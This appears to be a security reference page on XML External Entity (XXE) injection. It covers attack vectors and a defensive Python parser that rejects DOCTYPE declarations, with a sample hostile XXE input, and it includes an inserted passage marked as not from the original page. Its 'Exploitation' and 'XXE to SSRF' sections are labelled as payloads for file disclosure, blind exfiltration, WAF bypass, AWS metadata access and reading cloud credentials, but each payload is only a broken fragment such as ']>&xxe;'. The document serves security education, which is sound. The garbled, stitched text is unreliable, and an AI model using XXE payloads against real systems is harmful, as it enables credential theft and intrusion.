High Severity | A05
📄 XML External Entity (XXE)
🧠 Description
XXE vulnerabilities occur when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This can lead to SSRF, file disclosure, and remote code execution.
Attack Vectors:
- File Disclosure: Read local system files
- SSRF: Access internal services
- DoS: Billion laughs attack
- RCE: Via expect:// wrapper (PHP)
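As an added defender-side example (not code from the original page), the Python check below rejects any untrusted XML that carries a DOCTYPE declaration before it reaches a parser, and configures the standard-library SAX parser to never resolve external entities; the sample documents and the entity target are constructed placeholders.

```python
import re
import xml.sax
from io import BytesIO
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# Entity declarations only live in a DTD, so refusing the DOCTYPE outright
# blocks file-disclosure, SSRF and billion-laughs payloads before parsing.
# A raw-byte scan misses UTF-16 input; the parser features are the second layer.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)

class XXERejected(ValueError):
    """Raised when untrusted XML carries a DTD."""

class _Collector(ContentHandler):
    # Minimal handler: records element names and text content.
    def __init__(self):
        super().__init__()
        self.tags, self.text = [], []

    def startElement(self, name, attrs):
        self.tags.append(name)

    def characters(self, content):
        self.text.append(content)

def parse_untrusted(data: bytes):
    # Pre-parse rejection first, then parse with external entity resolution off.
    if _DOCTYPE_RE.search(data):
        raise XXERejected("DOCTYPE declaration not allowed in untrusted XML")
    parser = xml.sax.make_parser()
    # Set explicitly rather than trusting version-dependent defaults: never
    # fetch external general (&x;) or parameter (%x;) entities.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = _Collector()
    parser.setContentHandler(handler)
    parser.parse(BytesIO(data))
    return handler.tags, "".join(handler.text).strip()

def is_rejected(data: bytes) -> bool:
    try:
        parse_untrusted(data)
        return False
    except XXERejected:
        return True

# Constructed sample documents (not from the page); the probe's entity
# target is a placeholder and nothing is ever read from disk.
SAFE_XML = b'<?xml version="1.0"?><order><id>42</id></order>'
XXE_XML = (b'<?xml version="1.0"?><!DOCTYPE order [<!ENTITY ext SYSTEM '
           b'"file:///PLACEHOLDER">]><order><id>&ext;</id></order>')
```

Rejecting the DOCTYPE accepts a few false positives (a DOCTYPE inside a comment) in exchange for not depending on any parser's defaults.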
💣 Exploitation
```
# Basic XXE - File Disclosure
]>&xxe;
# External Entity with CDATA
]> &file;
# Blind XXE (OAST)
]> %xxe;
# Parameter Entity for WAF bypass
]]>">]> %xxe;
```
🔄 XXE to SSRF
```
# AWS Metadata
]>&xxe;
# Internal Port Scanning
]>&xxe;
# Read cloud credentials
]>&xxe;
```